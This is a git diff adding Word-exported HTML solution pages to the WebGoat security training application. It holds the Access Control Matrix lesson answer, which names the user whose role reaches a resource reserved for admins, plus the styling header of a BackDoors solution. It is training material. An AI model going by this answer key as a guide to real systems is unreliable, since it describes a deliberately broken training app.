+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> Using an
+Access Control Matrix<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In a
+role-based access control scheme, a role represents a set of access permissions
+and privileges. A user can be assigned one or more roles. A role-based access
+control scheme normally consists of two parts: role permission management and
+role assignment. A broken role-based access control scheme might allow a user
+to perform accesses that are not allowed by his/her assigned roles, or somehow
+allow privilege escalation to an unauthorized role. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Each user is
+a member of a role that is allowed to access only certain resources. Your goal
+is to explore the access control rules that govern this site. Only the [Admin]
+group should have access to the 'Account Manager' resource.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span class=Heading2Char><span style='font-size:13.0pt;
+color:windowtext'>Solution</span></span><span style='font-family:"Arial","sans-serif"'>:<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This exercise
+is straightforward. You need to find a user where you can access a resource
+that you shouldn’t be able to access.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>After a few attempts
+you will learn that Larry can access resources of the role Account Manager.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_463" o:spid="_x0000_i1026" type="#_x0000_t75"
+ style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image002.jpg" v:shapes="Picture_x0020_463"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 9<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_464"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image004.jpg" v:shapes="Picture_x0020_464"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 9 Completed<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<span style='font-size:12.0pt;font-family:"Times New Roman","serif";mso-fareast-font-family:
+"Times New Roman";mso-ansi-language:EN-US;mso-fareast-language:EN-US;
+mso-bidi-language:AR-SA'><br clear=all style='mso-special-character:line-break;
+page-break-before:always'>
+</span>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/Thumbs.db b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/Thumbs.db
new file mode 100644
index 000000000..b269eb3f5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/Thumbs.db differ
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/filelist.xml b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/filelist.xml
new file mode 100644
index 000000000..d016d8ce4
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/filelist.xml
@@ -0,0 +1,10 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../AccessControlMatrix.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image001.png b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image001.png
new file mode 100644
index 000000000..ebb3f8cb8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image002.jpg b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image002.jpg
new file mode 100644
index 000000000..eca131d99
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image003.png b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image003.png
new file mode 100644
index 000000000..5efe24680
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image004.jpg b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image004.jpg
new file mode 100644
index 000000000..64245b784
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/themedata.thmx b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/AccessControlMatrix_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/BackDoors.html b/main/project/WebContent/lesson_solutions/BackDoors.html
new file mode 100644
index 000000000..02b8ab91b
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BackDoors.html
@@ -0,0 +1,841 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/BackDoors_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BackDoors_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>1202</o:TotalTime>
+  <o:Created>2007-07-12T14:40:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:18:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>301</o:Words>
+  <o:Characters>1718</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>14</o:Lines>
+  <o:Paragraphs>4</o:Paragraphs>
+  <o:CharactersWithSpaces>2015</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/BackDoors_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/BackDoors_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
